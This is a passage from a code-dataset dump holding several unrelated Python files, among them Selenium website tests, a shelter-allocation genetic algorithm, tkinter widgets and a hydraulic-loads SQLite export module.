subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=rf, stderr=subprocess.STDOUT, shell=False)\n# proc = subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False)\n \n (out, err)= proc.communicate()\n# print(out.decode('utf-8').splitlines())\n# print(out)\n# print(err)\n print('Model saved: ', self.save_model_file)\n \n \n\n def gen_run_file(self, test_data_file, run_file):\n pre_run_file = run_file.replace('run_', 'pre_run_', 1)\n toolkit_parameters = [\n *self.ranker_command, # * to unpack list elements\n '-load',\n self.save_model_file,\n *self.normalization,\n '-rank',\n test_data_file,\n '-indri',\n pre_run_file \n ] \n \n print(toolkit_parameters)\n with open(self.log_file, 'at') as rf:\n proc = subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=rf, stderr=subprocess.STDOUT, shell=False)\n# proc = 
subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False)\n \n (out, err)= proc.communicate()\n# print(out.decode('utf-8').splitlines())\n# print(out)\n# print(err)\n\n \n generate_run_file(pre_run_file, run_file)\n \n# print('Run model saved: ', run_file)\n","sub_path":"ir_lmart.py","file_name":"ir_lmart.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"518411174","text":"\"\"\"An assessment excercise for Levels Beyond by Kyle Olsen\"\"\"\n\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass TestReachEngineCom(unittest.TestCase):\n \"\"\"Tests basic functionality of www.reachengine.com.\n\n An automation assignment which tests the basic functionality of\n www.reachengine.com. Requirement descriptions are listed in\n QA_automation_assignment.pdf.\n\n Attributes:\n driver: The Selenium driver\n \"\"\"\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(10) #Wait time in seconds\n\n def test_google_reach_engine(self):\n self.driver.get('http://www.google.com')\n\n search = self.driver.find_element_by_name('q')\n search.send_keys('levels beyond reach engine')\n search.send_keys(Keys.RETURN)\n\n result = self.driver.find_element_by_id('rso')\n self.assertIn('www.reachengine.com',\n result.find_element_by_xpath('//div/cite').text)\n result.find_element_by_xpath('//div/h3/a').click()\n\n self.assertIn('Reach Engine',\n self.driver.find_element_by_id('footer-info').text)\n\n def test_our_team(self):\n self.driver.get('https://www.reachengine.com/company/team/')\n\n self.assertIn('Our Team',\n self.driver.find_element_by_xpath('//h1').text)\n\n def test_art_ceo(self):\n self.driver.get('https://www.reachengine.com/company/team/')\n\n member_search = self.driver.find_elements_by_class_name('et_pb_team_member_description')\n for member in member_search:\n if member.find_element_by_class_name('et_pb_member_position').text == 'CEO':\n self.assertIn('Art Raymond', member.find_element_by_xpath('//h4').text)\n break\n else:\n self.fail(\"No CEO was found.\")\n\n def test_art_search(self):\n self.driver.get('https://www.reachengine.com/company/team/')\n\n art_search = self.driver.find_elements_by_xpath('//*[contains(text(),\"Art Raymond\")]')\n self.assertTrue(len(art_search) >= 3)\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test_reach_engine_com.py","file_name":"test_reach_engine_com.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95262939","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndata = np.loadtxt('GAIL_TRPO_Pusher.csv', delimiter=',')\ninput1 = data[:,0]\noutput = data[:,1]\n\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\n\nx = np.linspace(-6,6,1000)\n#plt.style.use('ggplot')\n#ax.plot(input1, output, color='blue', linestyle='solid')\nax.plot(input1, output)\n\nax.set_title('Pusher')\nax.set_xlabel('Time Steps')\nax.set_ylabel('Rewards')\nax.grid(True)\n\nplt.savefig(\"GAIL_TRPO_Pusher.eps\")\nfig.show()\n","sub_path":"2eps2.py","file_name":"2eps2.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"358101772","text":"import os, json\nDIR = 
os.path.dirname(os.path.abspath(__file__))\ndataDir = \"../data/\"\ndef getPOS(myfile=\"toFr-1.0.json\"):\n    dataFile = dataDir+myfile\n    dataFilepath = os.path.join(DIR, dataFile)\n    with open(dataFilepath) as f:\n        data = json.load(f)\n    parseJson(data)\n\n\ndef parseJson(data):\n    listPOS = []\n    for word in data[\"translations\"]:\n        listPOS.extend(parseEntry(word[\"source\"]))\n        for entry in word[\"target\"]:\n            listPOS.extend(parseEntry(entry))\n    print(set(listPOS))\n\ndef parseEntry(entry):\n    sensePOSList = []\n    for sense in entry[\"sense\"]:\n        sensePOSList.append(sense[\"partOfSpeech\"])\n    return sensePOSList\n\ngetPOS()","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"605404505","text":"# Multi-objective genetic algorithm model\n# Try initialising the population from matrix B to see whether it speeds up convergence\nimport numpy as np\nimport pandas as pd\nimport xlrd\ndf1 = pd.read_excel('模型参数.xls',sheetname='Sheet1',header =0 )\ndf2 = pd.read_excel('模型参数.xls',sheetname='Dij',header=None)\nDNA_SIZE = 55  # number of shelters (length of one DNA segment)\nPOP_SIZE = 1000\nCROSS_RATE = 0.7\nMUTATION_RATE = 0.35\nN_GENERATIONS = 1000\nS = df1['S'].dropna(axis=0).values  # living area (capacity) of each shelter\nD = df2.values  # distance matrix\nP = df1['P'].values  # population of each residential site\nDmax = df1['Dmax'].values\nB_toSub = []\ndef F1(pop):\n\t# pop --> [100,243,55]\n\tYY = []\n\tfor ii in range(len(pop)):\n\t\tYY.append(solve_Y(pop[ii]))\n\t# S --> [55,1]\n\tY = np.array(YY)\n\t# Y --> [POP_SIZE,55]\n\treturn np.dot(Y,S)\ndef F2(pop):\n\tDist = []\n\tfor j in range(len(pop)):\n\t\tB = pop[j]\n\t\tdist = np.sum(B*D)\n\t\tDist.append(dist)\n\treturn np.array(Dist)\ndef get_fitness(v1,v2,pop):\n\t# v1/v2 --> [100,]\n\t# Fitness based on the Pareto principle: count how many individuals this one dominates.\n\tnq = []\n\tfor x in range(POP_SIZE):\n\t\tcompare = 0\n\t\tcount = 0\n\t\tfor xx in range(POP_SIZE):\n\t\t\tif v1[x] < v1[xx]:\n\t\t\t\tcompare +=1\n\t\t\tif v1[x]>v1[xx]:\n\t\t\t\tcontinue\n\t\t\tif v2[x] < v2[xx]:\n\t\t\t\tcompare +=1\n\t\t\tif v2[x]>v2[xx]:\n\t\t\t\tcontinue\n\t\t\tif compare >=1:\n\t\t\t\tcount = count+1\n\t\tfitness_add = int(POP_SIZE*0.8)\n\t\tif isSubjectTo(pop[x]):\n\t\t\tnq.append(fitness_add)\n\t\telse:\n\t\t\tnq.append(count+1)\n\treturn nq\n\ndef select(pop,fitness):\n\tglobal POP_SIZE\n\tidx = np.random.choice(np.arange(POP_SIZE), size=POP_SIZE, replace=True,p=fitness/fitness.sum())\n\treturn pop[idx]\n\ndef crossover(parent, pop):\n\t# Decide whether this parent takes part in crossover.\n\tif np.random.rand() < CROSS_RATE:\n\t\t# Pick a random individual from pop to mate with the parent.\n\t\ti_ = np.random.randint(0, POP_SIZE, size=1)\n\t\t# Randomly choose the gene positions where crossover happens.\n\t\tcross_points = np.random.randint(0, 2, size=243).astype(bool)\n\t\t# Swap in the genes at the selected positions.\n\t\tparent[cross_points] = pop[i_, cross_points,:]\n\treturn parent\n\ndef mutate(child):\n\tif np.random.rand() < MUTATION_RATE:\n\t\tfor point in range(243):\n\t\t\tif np.random.rand() < MUTATION_RATE:\n\t\t\t\tchild[point,:] = np.zeros((1,55))\n\t\t\t\tdna_point = np.random.choice(np.arange(DNA_SIZE), size=1, replace=True,p=S/S.sum())\n\t\t\t\tchild[point,dna_point] = 1\n\treturn child\ndef solve_Y(B):\n\t# Solve BY=E for Y; Y is easy here: whenever a column of B has a nonzero entry, the matching entry of Y is 1.\n\t# Y --> [55,]\n\tY = np.zeros((55))\n\tB_sum = B.sum(axis=0)\n\tY[B_sum>0] = 1\n\treturn Y\n\ndef isSubjectTo(B):\n\t# Constraint 1: capacity demanded at each of the 55 shelters under plan B.\n\t#abc = P.T\n\tcapacity_need = np.dot(P.T,B)\n\tY = solve_Y(B)\n\tcapacity = Y*S\n\tdiff = capacity_need-capacity\n\tst1 = diff[diff>0].size\n\t# Constraint 2: the distance condition.\n\tdist_sum = np.sum(B*D,axis=1)\n\tdiff2 = dist_sum-Dmax\n\tst2 = diff2[diff2>0].size\n\tif st1 == 0 and st2 == 0:\n\t\tprint('Found a plan satisfying the constraints',Y)\n\t\tB_toSub.append(B)\n\t\tTag = 
True\n\telse:\n\t\tprint(st1,st2)\n\t\tTag = False\n\treturn Tag\n\ndef init_pop():\n\tpop = np.zeros([POP_SIZE,243,DNA_SIZE])\n\tfor index in range(POP_SIZE):\n\t\tfor index_ in range(243):\n\t\t\tone_ind = np.random.randint(0,DNA_SIZE,1)\n\t\t\tpop[index,index_,one_ind] = 1\n\treturn pop\npop = init_pop()\ncount_all = []\nfor _ in range(N_GENERATIONS):\n\tcount = 0\n\tv1 = F1(pop)\n\tv2 = F2(pop)\n\tfitness = np.array(get_fitness(v1,v2,pop))\n\t# print(\"Most fitted DNA: \", pop[np.argmax(fitness), :])\n\tpop = select(pop,fitness)\n\tpop_copy = pop.copy()\n\tfor parent in pop:\n\t\tif isSubjectTo(parent):\n\t\t\tcount +=1\n\t\tchild = crossover(parent,pop_copy)\n\t\tchild = mutate(child)\n\t\tparent[:] = child\n\tcount_all.append(count/POP_SIZE)\n\tprint(\"Finished generation\", _)\n\tif POP_SIZE > 100:\n\t\tPOP_SIZE = POP_SIZE-15\n\telse:\n\t\tPOP_SIZE = 100","sub_path":"多目标遗传算法模型.py","file_name":"多目标遗传算法模型.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"499191617","text":"\"\"\"\nUsing a Brickman (robot) as the receiver of messages.\n\"\"\"\n\n# Same as m2_fake_robot_as_mqtt_sender,\n# but have the robot really do the action.\n# Implementing just FORWARD at speeds X and Y is enough.\n\nimport tkinter\nfrom tkinter import ttk\nimport mqtt_remote_method_calls as com\nimport time\n\ndef main():\n    root = tkinter.Tk()\n\n    frame = ttk.Frame(root, padding=10)\n    frame.grid()\n\n    # -------------------------------------------------------------------------\n    # This example puts the widgets in a 3-column, 2-row grid\n    # with some of the grid-places empty. Here are the WIDGETS:\n    # -------------------------------------------------------------------------\n\n    label = ttk.Label(frame, text=\"movement\")\n    entry_box = ttk.Entry(frame)\n    entry_box2 = ttk.Entry(frame)\n\n    button1 = ttk.Button(frame, text=\"forward\")\n    button1['command'] = (lambda: send_it(entry_box,entry_box2))\n\n\n    # -------------------------------------------------------------------------\n    # Here is the use of GRID with rows and columns:\n    # -------------------------------------------------------------------------\n    label.grid(row=0, column=0)\n    entry_box.grid(row=1, column=0)\n    entry_box2.grid(row=1,column=1)\n    button1.grid(row=0, column=1)\n    root.mainloop()\n\ndef send_it(x,y):\n    mqtt_client = com.MqttClient()\n    mqtt_client.connect('Kirk', 'Preston')\n    time.sleep(1)  # Time to allow the MQTT setup.\n    mqtt_client.send_message('handle_forward',[x.get(),y.get()])\n    print()\n\nmain()\n","sub_path":"src/m3_robot_as_mqtt_receiver.py","file_name":"m3_robot_as_mqtt_receiver.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"297662366","text":"# Multiple Linear Regression\n# Author: JC\n# Date: 30 Nov 19\n\nimport numpy as np\n\nm,n = map(int,input().split())\nY = []\nX = []\nX_ip = []\n\nfor j in range(0,n):\n    a = list(map(float,input().split()))\n    X.append(1)\n    for b in range(0,m):\n        X.append(a[b])\n    Y.append(a[-1])\n\ni = int(input())\n# print(i)\nfor x in range(0,i):\n    # print(x)\n    a = list(map(float,input().split()))\n    X_ip.append(1)\n    for b in range(0,m):\n        X_ip.append(a[b])\n\nX = np.array(X).reshape(n,m+1)\n# print(X)\n\nY = np.array(Y).reshape(n,1)\n# print(Y)\n\nX_ip = np.array(X_ip).reshape(i,m+1)\n# print(X_ip)\n\n# Normal equations: B = (X^T X)^{-1} X^T Y\nX_t = X.transpose()\nA_temp_1 = X_t.dot(X)\nA_temp_1_inv = np.linalg.inv(A_temp_1)\nA_temp_2 = A_temp_1_inv.dot(X_t)\nB = 
A_temp_2.dot(Y)\n\nY_op = X_ip.dot(B)\n\nfor x in range(0,i):\n print(float(Y_op[x]))\n\n \n\n","sub_path":"Multiple_Linear_Regression.py","file_name":"Multiple_Linear_Regression.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"341388781","text":"import json\nimport os\n\n#The .json files that contain the similar images (created by compare_images.py)\nJSON_FILE_PATHS = ['similar-covid-images.json','similar-normal-images.json','similar-pneumonia-images.json']\n\ndef main():\n #Removes the duplicates that are stored in the .json files\n for file_path in JSON_FILE_PATHS:\n remove_duplicates(file_path)\n\n\ndef remove_duplicates(json_file_path):\n \"\"\"\n This will remove all the duplicates from an image, given in the json file\n The json has to have the following format:\n {\n 'image1.png':['image2.png','image3.png']\n 'image2.png':['image4.png','image5.png']\n ..-\n }\n That means that image1 & image2 are very similar, and image1 & image3 are very similar.\n\n\n Args:\n json_file_path (string): oath to the json file\n \"\"\"\n import json\n count = 0\n with open(json_file_path) as f:\n similarities = json.load(f) \n for _ , duplicates in similarities.items():\n for duplicate in duplicates:\n try:\n os.remove(duplicate)\n except:\n print('failed to delete...')\n count = count + 1\n print(f\"Removed {count} images.\")\n\nif __name__ == '__main__':\n main()","sub_path":"CV-Code/remove_duplicate_images.py","file_name":"remove_duplicate_images.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213826115","text":"# This is a Custom widget capabale of containing many frames(Sub custom widgets)\n# inside a single scrollable Frame containing a parent canvas\nfrom tkinter import *\n\n\nclass ScrollableFrame(Frame):\n def __init__(self, parent, spacing, margin):\n super(ScrollableFrame, self).__init__(parent)\n self.last_end = 0\n self.spacing = spacing\n self.margin = margin\n self.canv = Canvas(self, bg='lightgreen', height='300', width='500', scrollregion=(0, 0, 0, 1000))\n\n # to use scrollbar\n self.scrollbar = Scrollbar(self, orient=\"vertical\", command=self.canv.yview)\n self.canv.configure(yscrollcommand=self.scrollbar.set)\n self.scrollbar.pack(side=\"right\", fill=\"y\")\n\n self.canv.pack()\n self.canv.bind_all(\"\", self.on_mouse_wheel)\n self.frames = []\n\n def insert_frame_end(self, frame):\n self.frames.append(frame)\n frame.update()\n self.canv.create_window((self.margin, self.last_end), window=frame)\n self.last_end+=frame.winfo_reqheight()\n # self.last_end += (self.spacing + frame.winfo_reqheight())\n # total_occupied=len(self.frames)*frame.winfo_reqheight()\n # # total_occupied=sum([x.winfo_reqheight() for x in self.frames])\n # if total_occupied>self.canv.winfo_height():\n # prev = self.canv['scrollregion']\n # print(prev[6])\n # self.canv['scrollregion'] = (0, 0, 0, int(prev[6]) + self.spacing + frame.winfo_reqheight())\n\n def insert_frame_beg(self):\n pass\n\n def on_mouse_wheel(self, event):\n # -1 is for direction inversion\n self.canv.yview_scroll(-1 * (event.delta // 200), \"units\")\n\n def remove_frame(self,frame_object):\n for x in self.frames:\n if x is frame_object:\n x.destroy()\n self.frames.remove(x)\n\n\n\n# root = Tk()\n# sr = ScrollableFrame(root, 100, 60)\n# sr.pack()\n# # Tk.update(fr)\n# # print(fr.winfo_reqheight())\n# for x in range(100):\n# fr = Frame()\n# 
label = Label(fr, text=\"Hello text\")\n# label.pack()\n# entry = Entry(fr)\n# entry.pack()\n# sr.insert_frame_end(fr)\n#\n# root.mainloop()\n","sub_path":"src/customComponents/Custom_Scrollable_Frame_widget.py","file_name":"Custom_Scrollable_Frame_widget.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"176270085","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on : Tue Jul 11 11:35:04 2017\nAuthor : Guus Rongen\nProject : PR3594.10.00\nDescription :\n\"\"\"\n\nimport logging\nimport os\nimport sqlite3\n\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nfrom shapely.geometry import Point\n\nfrom hbhavens.core import datamodels\n\nlogger = logging.getLogger(__name__)\n\n\ninputvariableids = {\n 1 : \"Discharge Lobith\",\n 2 : \"Discharge Lith\",\n 3 : \"Discharge Borgharen\",\n 4 : \"Discharge Olst\",\n 5 : \"Discharge Dalfsen\",\n 6 : \"Water level Maasmond\",\n 7 : \"Water level IJssel lake\",\n 8 : \"Water level Marker lake\",\n 9 : \"Wind speed\",\n 10 : \"Water level\",\n 11 : \"Wave period\",\n 12 : \"Sea water level\",\n 13 : \"Wave height\",\n 14 : \"Sea water level (u)\",\n 15 : \"Uncertainty water level (u)\",\n 16 : \"Storm surge duration\",\n 17 : \"Time shift surge and tide\",\n}\n\nintputvarabr = {\n \"Discharge Lobith\": 'Q={:05.0f}',\n \"Discharge Lith\": 'Q={:05.0f}',\n \"Discharge Borgharen\": 'Q={:05.0f}',\n \"Discharge Olst\": 'Q={:05.0f}',\n \"Discharge Dalfsen\": 'Q={:05.0f}',\n \"Water level Maasmond\": 'M={:04.2f}',\n \"Water level IJssel lake\": 'M={:04.2f}',\n \"Water level Marker lake\": 'M={:04.2f}',\n \"Wind speed\": 'U={:02.0f}',\n \"Water level\": 'h={:03.1f}',\n \"Sea water level\": 'M={:04.2f}',\n \"Storm surge duration\": 'D={:03.0f}',\n \"Time shift surge and tide\": 'P={:03.0f}',\n \"Wind direction\": 'D={:05.1f}',\n \"ClosingSituationId\": 'K={:02d}',\n}\n\nresultvariableids = {\n 1 : \"h\",\n 2 : \"Hs\",\n 3 : \"Ts\",\n 4 : \"Tp\",\n 5 : \"Tpm\",\n 6 : \"Tm-1,0\",\n 7 : \"Wave direction\"\n}\n\ndef add_to_table(tablename, dataframe, conn):\n\n # First check if table exists\n n = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name=?;\", (tablename,)).fetchall()\n if not np.size(n):\n raise ValueError('Table \"{}\" does not exist'.format(tablename))\n\n # Secondly check if all columns are present in the table\n columns = [r[1] for r in conn.execute(\"PRAGMA TABLE_INFO('{}');\".format(tablename)).fetchall()]\n try:\n dataframe = dataframe[columns]\n except ValueError as err:\n print('The input dataframe does not have the right columns:', err.args)\n\n # Voeg toe aan tabel\n dataframe.to_sql(tablename, conn, if_exists='append', chunksize=100000, index=False)\n\nclass ExportResultTable(datamodels.ExtendedDataFrame):\n\n _metadata = [\n 'hydraulic_loads', 'result_columns', 'input_columns', 'sort_cols', 'settings'\n ]\n\n def __init__(self, mainmodel):\n super(ExportResultTable, self).__init__()\n \n # Links\n self.hydraulic_loads = mainmodel.hydraulic_loads\n self.settings = mainmodel.project.settings\n\n # Link to columns\n self.result_columns = mainmodel.hydraulic_loads.result_columns\n self.input_columns = mainmodel.hydraulic_loads.input_columns\n self.sort_cols = ['Location', 'HydraulicLoadId']\n\n # self.HRDLocations = pd.DataFrame(\n # columns=['HRDLocationId', 'LocationTypeId', 'Name', 'XCoordinate', 'YCoordinate', 'WaterLevelCorrection']\n # )\n\n # self.UncertaintyModelFactor = pd.DataFrame(\n # 
columns=['HRDLocationId', 'ClosingSituationId', 'HRDResultColumnId', 'Mean', 'Standarddeviation']\n # )\n\n def add_interpolated_results(self, results, column_mapping):\n \"\"\"Method to interpolate results from recalculated water levels\n to original water levels, and add the tow the export dataframe class.\n \n Parameters\n ----------\n results : pandas.DataFrame\n DataFrame with results\n column_mapping : dict\n Dictionary with the translation form column name in dataframe to column name\n in output (database)\n \"\"\"\n if not self.settings['hydraulic_loads']['recalculate_waterlevels']:\n raise ValueError('This function should only be used when waterlevels are recalculated.')\n \n # Check mapping\n if not set(list(column_mapping)).issuperset(set(self.result_columns)):\n raise KeyError(f'Did not get all required columns. Expected: {set(self.result_columns)}, got {set(list(column_mapping))}')\n\n # Interpolate wave conditions on water levels\n interp_results = self.hydraulic_loads.interpolate_wave_conditions(results, column_mapping)\n\n # Empty results\n self.delete_all()\n self.reindex_inplace(columns=interp_results.columns)\n self.set_data(interp_results)\n\n # Check sort columns presence\n for col in self.sort_cols:\n if col not in interp_results.columns.array:\n raise KeyError(f'Results are missing column \"{col}\"')\n\n # Check if there are NaNs in the resulttable\n if self.isnull().any().any():\n raise ValueError('NaN values in result table.')\n\n def add_results(self, results, column_mapping):\n \"\"\"Method to add results from different calculation types to export dataframe.\n \n Parameters\n ----------\n results : pandas.DataFrame\n DataFrame with results\n column_mapping : dict\n Dictionary with the translation form column name in dataframe to column name\n in output (database)\n \"\"\"\n\n # Recalculate water levels\n if self.settings['hydraulic_loads']['recalculate_waterlevels']:\n raise ValueError('This function should not be used when waterlevels are recalculated.')\n\n # Empty results\n self.delete_all()\n self.reindex_inplace(columns=self.sort_cols + self.input_columns + self.result_columns)\n\n # Check mapping\n if not set(list(column_mapping)).issuperset(set(self.result_columns)):\n raise KeyError(f'Did not get all required columns. Expected: {set(self.result_columns)}, got {set(list(column_mapping))}')\n\n for col in self.sort_cols:\n if col not in results.columns.array:\n raise KeyError(f'Results are missing column \"{col}\"')\n \n # Determine what columns in the table match with the required columns\n tablecols = [column_mapping[col] for col in self.result_columns]\n # Add Location and Load columns for sorting\n tablecols += self.sort_cols\n\n # Check if the needed columns are present in the table (check for nan on reindex)\n result_selection = results.reindex(columns=tablecols)\n if result_selection.isnull().any().any():\n columns = ', '.join(result_selection.columns.to_numpy()[result_selection.isnull().any(axis=0)].astype(str).tolist())\n index = result_selection.isnull().any(axis=1).sum()\n raise ValueError(f'NaN values in results. Columns: {columns}, Index: {index}/{len(result_selection)}')\n\n result_selection = result_selection.sort_values(\n by=self.sort_cols).rename(columns={v: k for k, v in column_mapping.items()})\n \n self.loc[:, self.sort_cols + self.result_columns] = result_selection.reset_index(drop=True)\n\n # 2. Add hydraulic loads\n # Only if not recalculated water levels. 
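        # Note: the np.tile step below repeats the full hydraulic-load input block
        # once per location, so it relies on the results being sorted by
        # (Location, HydraulicLoadId) first. A tiny standalone sketch of the same
        # numpy pattern, with made-up shapes rather than project data:
        #     loads = np.array([[1, 2], [3, 4]])   # 2 loads x 2 input columns
        #     np.tile(loads, (3, 1))               # 6 rows: the 2 loads repeated 3x
        # i.e. row k of the tiled block carries load k % 2 for location k // 2.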
If recalculated water levels, the original hydraulic loads are used\n # and these are already present in the result from the function 'interpolate_wave_conditions'\n if not self.settings['hydraulic_loads']['recalculate_waterlevels']:\n nlocations = len(self['Location'].unique())\n self.loc[:, self.input_columns] = np.tile(self.hydraulic_loads.sort_index()[self.input_columns].values, (nlocations, 1))\n\n # Check if there are NaNs in the resulttable\n if self.isnull().any().any():\n raise ValueError('NaN values in result table.')\n\n def set_hrdlocationid(self, tab):\n \"\"\"Add HRDLocationId\n \n Parameters\n ----------\n tab : pandas.DataFrame\n DataFrame with 'Naam' and 'HRDLocationId' columns\n \"\"\"\n \n dct = {row.Naam: row.HRDLocationId for row in tab.itertuples()}\n self['HRDLocationId'] = [dct[row.Location] for row in self.itertuples()]\n\nclass HRDio:\n\n def __init__(self, path):\n\n self.path = path\n if not os.path.exists(path):\n raise OSError(f'Path \"{path}\" does not exist.')\n\n self.conn = None\n\n # Get database format\n self._connect()\n columns = [col[1] for col in self.conn.execute('PRAGMA table_info(HydroDynamicData);').fetchall()]\n self.dbformat = 'OS2023' if 'HydraulicLoadId' in columns else 'WBI2017'\n self._close()\n \n def _connect(self):\n self.conn = sqlite3.connect(self.path)\n\n def _close(self):\n self.conn.close()\n\n def remove_locations(self, polygon, exemption=''):\n \"\"\"\n Remove locations and corresponding hydro dynamic data from db\n\n Parameters\n ----------\n polygon : shapely.geometry.Polygon\n Polygon within which the locations are removed\n \n Returns\n -------\n remove_ids : list\n List with the HRDLocationIds of the removed locations\n \"\"\"\n\n if isinstance(exemption, str):\n exemption = [exemption]\n\n # Get locations\n self._connect()\n remove_ids = []\n sql = f'SELECT HRDLocationId, Name, XCoordinate, YCoordinate FROM HRDLocations;'\n locations = self.conn.execute(sql)\n for locid, name, x, y in locations:\n if polygon.intersects(Point(x, y)):\n if name in exemption:\n logger.warning('The support location is in the harbor bounds, but will not be removed.')\n continue\n remove_ids.append(locid)\n remove_id_str = ','.join(map(str, remove_ids))\n \n if self.dbformat == 'WBI2017':\n # Collect HydroDynamicDataIds\n sql = f'SELECT HydroDynamicDataId FROM HydroDynamicData WHERE HRDLocationId IN ({remove_id_str});'\n data_ids = self.conn.execute(sql).fetchall()\n data_id_str = ','.join(str(i[0]) for i in data_ids)\n\n # Delete from HRDLocations and UncertaintyModelFactor\n for table in ['HRDLocations', 'UncertaintyModelFactor']:\n self.conn.execute(f'DELETE FROM {table} WHERE HRDLocationId IN ({remove_id_str});')\n\n # Delete from HydroDynamicData, HydroDynamicInputData and HydroDynamicResultData\n for table in ['HydroDynamicData', 'HydroDynamicInputData', 'HydroDynamicResultData']:\n self.conn.execute(f'DELETE FROM {table} WHERE HydroDynamicDataId IN ({data_id_str});')\n\n if self.dbformat == 'OS2023':\n # Delete from HRDLocations, UncertaintyModelFactor and HydroDynamicResultData\n for table in ['HRDLocations', 'UncertaintyModelFactor', 'HydroDynamicResultData']:\n self.conn.execute(f'DELETE FROM {table} WHERE HRDLocationId IN ({remove_id_str});')\n\n self.conn.commit()\n self._close()\n\n return remove_ids\n\n def get_track_id(self):\n self._connect()\n systemid = self.conn.execute('SELECT TrackID FROM General;').fetchone()[0]\n self._close()\n return systemid\n\n def get_system_id(self):\n self._connect()\n systemid = 
self.conn.execute('SELECT GeneralId FROM General;').fetchone()[0]\n self._close()\n return systemid\n\n def get_type_of_hydraulic_load_id(self):\n \"\"\"\n Get type of hydraulic data\n \"\"\"\n self._connect()\n resultvariables = np.hstack(self.conn.execute('SELECT ResultVariableId FROM HRDResultVariables;').fetchall())\n self._close()\n\n # TypeOfHydraulicData Water level or Wave data\n if (1 in resultvariables) and (2 in resultvariables):\n # Wave and Water level\n TypeOfHydraulicDataId = 2\n elif (1 in resultvariables):\n # Water level\n TypeOfHydraulicDataId = 1\n else:\n # Wave data\n TypeOfHydraulicDataId = 3\n\n return TypeOfHydraulicDataId\n\n def get_max_hrdlocation_id(self):\n self._connect()\n maxhrdlocid = self.conn.execute('SELECT MAX(HRDLocationId) FROM HRDLocations;').fetchone()[0]\n self._close()\n return maxhrdlocid\n\n def add_hrd_locations(self, locations):\n \"\"\"\n Function to prepare a HRDLocations table for export, from a geopandas\n GeoDataFrame\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n \"\"\"\n\n self._connect()\n # Create empty dataframe with columns from db table\n columns = [col[1] for col in self.conn.execute('PRAGMA table_info(HRDLocations);').fetchall()]\n HRDLocations = pd.DataFrame(columns=columns)\n\n # Fill dataframe\n HRDLocations[['Name', 'HRDLocationId']] = locations[['Exportnaam', 'HRDLocationId']]\n HRDLocations[['XCoordinate', 'YCoordinate']] = [list(pt.coords[0]) for pt in locations['geometry']]\n HRDLocations[['XCoordinate', 'YCoordinate']] = HRDLocations[['XCoordinate', 'YCoordinate']].round(3)\n HRDLocations['WaterLevelCorrection'] = 0.0\n HRDLocations['LocationTypeId'] = 2\n\n if 'Acceptatie geometrie' in columns:\n HRDLocations['Acceptatie geometrie'] = 1\n\n # Add to database\n add_to_table('HRDLocations', HRDLocations, self.conn)\n\n self.conn.commit()\n self._close()\n \n def add_hydro_dynamic_data(self, resultdata, supportlocid=None):\n \"\"\"\n Export HydroDynamicData to database\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n resultdata : pandas.DataFrame\n Resultdata to be transformed and exported\n \"\"\"\n\n self._connect()\n if self.dbformat == 'WBI2017':\n # Add max value to HydroDynamicDataId\n max_hddid = self.conn.execute('SELECT MAX(HydroDynamicDataId) FROM HydroDynamicData;').fetchone()[0]\n resultdata.loc[:, 'HydroDynamicDataId'] = np.arange(len(resultdata)) + 1 + max_hddid\n\n # HydroDynamicData\n #-------------------------------------------------------------\n HydroDynamicData = resultdata.reindex(columns=['HydroDynamicDataId', 'ClosingSituationId', 'HRDLocationId', 'Wind direction'])\n # Transform wind directions\n winddirection_conv = {k: v for k, v in self.conn.execute('SELECT Direction, HRDWindDirectionId FROM HRDWindDirections').fetchall()}\n HydroDynamicData.loc[:, 'HRDWindDirectionId'] = [winddirection_conv[wd] for wd in HydroDynamicData['Wind direction'].array]\n # If ClosingSituationId not present in resultdata, set to 1.\n if pd.isnull(HydroDynamicData['ClosingSituationId']).all():\n HydroDynamicData.loc[:, 'ClosingSituationId'] = 1\n # Add to database\n add_to_table('HydroDynamicData', HydroDynamicData, self.conn)\n\n # HydroDynamicInputData\n #-------------------------------------------------------------\n HRDInputVariables = pd.read_sql('SELECT * FROM HRDInputVariables;', self.conn)\n HydroDynamicInputData = resultdata[['HydroDynamicDataId'] + [inputvariableids[ivid] for ivid in 
